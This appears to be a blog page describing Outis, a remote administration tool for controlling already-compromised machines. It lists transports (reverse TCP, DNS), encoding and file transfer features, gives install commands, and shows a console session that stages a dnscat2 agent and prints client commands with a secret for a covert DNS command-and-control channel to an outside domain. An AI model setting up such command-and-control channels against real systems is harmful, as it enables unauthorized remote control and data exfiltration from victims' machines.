Outis: Remote Administration Tool (RAT)


Outis: Remote Administration Tool (RAT)

Outis is a custom Remote Administration Tool (RAT) that allows the user to communicate between the server and a target system which has already been compromised. It can allow the software to transfer files, share sockets, spawn sockets and perform numerous other tasks. It is built upon other similar tools such as Empire, Metasploit and ReflectiveDLLInjection.

Outis: Remote Administration Tool (RAT)

Outis is an all-round tool through which the user can perform various tasks. The currently supported transports are Reverse TCP and DNS. Outis allows the agent stages to be encoded and authenticated for additional security. This custom RAT also allows the user to ping requests to check the connection and upload or download files from the targeted system.

Features:

  • Allows communication between server and target system
  • Communication can be secured through various protocols.
CRIPTOGRAPHY
– Encoding using cyclic XOR
– Authentication using RSA signatures and pinned certificates – Encrypted transport connections using TLS test
CONTROLS
– Ping requests to test connection
– Text message format – Upload/download files
EXTRAS
– Option to stage the tool dnscat2 / dnscat2-powershell outside the default outis agent using third-party tools.
TRANSPORTS
– Reverse TCP
– DNS (different types for staging and agent connection)

Supported Platforms:

  • Linux

Requirements:

  • Python 3+
  • Various Python packages (appdir, progressbar2, pycparser, pycrypto, pyOpenSSL, pyparsing, etc.)
Archlinux users: Click the “documentation” button below to check which dependencies (packages) need to be installed for the handler.

Install

Clone the GitHub repo:

$ git clone https://github.com/SySS-Research/outis.git --recursive

Install the dependencies (example):

$ pip install progressbar2 dnspython pycrypto pyopenssl

Example

$ outis
outis> set TRANSPORT DNS
outis> set AGENTTYPE DNSCAT2
outis> set ZONE zfs.sy.gs
outis> run
[+] DNS listening on 0.0.0.0:53
[+] Sending staged agent (406569 bytes)...
100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17
[+] Staging done
[+] Starting dnscat2 to handle the real connection
 
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
 
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = zfs.sy.gs]...
 
Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):
 
  ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs
 
To talk directly to the server without a domain name, run:
 
  ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==
 
Of course, you have to figure out  yourself! Clients
will connect directly on UDP port 53.
 
dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
Documentation Box
Download Box